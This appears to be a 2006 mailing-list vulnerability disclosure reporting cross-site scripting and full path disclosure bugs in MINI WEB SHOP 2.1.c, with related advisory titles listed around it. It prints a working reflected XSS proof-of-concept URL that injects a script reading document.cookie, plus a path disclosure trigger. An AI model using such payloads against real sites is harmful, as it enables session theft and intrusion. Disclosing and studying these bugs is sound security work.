Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [SA23406] Novell NetWare Welcome web-app Cross-Site Scripting Vulnerability [SA23388] eyeOS File Upload Vulnerability cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability cwmVote 1.0 File Include Vulnerability From:xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com> Date:20.12.2006Subject:Multiple Bugs in MINI WEB SHOPHello Vulnerable : MINI WEB SHOP Version: 2.1.c web : http://ObieWebsite.SourceForge.net I Found some bugs ( XSS & Full Path Disclosure ) in MINI WEB SHOP XSS : http://example.com/miniwebshop/modules/viewcategory.php?catname='><scri pt>alert(document.cookie)</script> Full Path Disclosure : http://example.com/miniwebshop/modules/viewcategory.php?catname=[anything] Discovery by Linux_Drox ( Qptan ) Linux_Drox@Saudi.Net.Sa www.LeZr.Com/vb Best Regards ,,,
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[SA23406] Novell NetWare Welcome web-app Cross-Site Scripting Vulnerability
[SA23388] eyeOS File Upload Vulnerability
cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
cwmVote 1.0 File Include Vulnerability
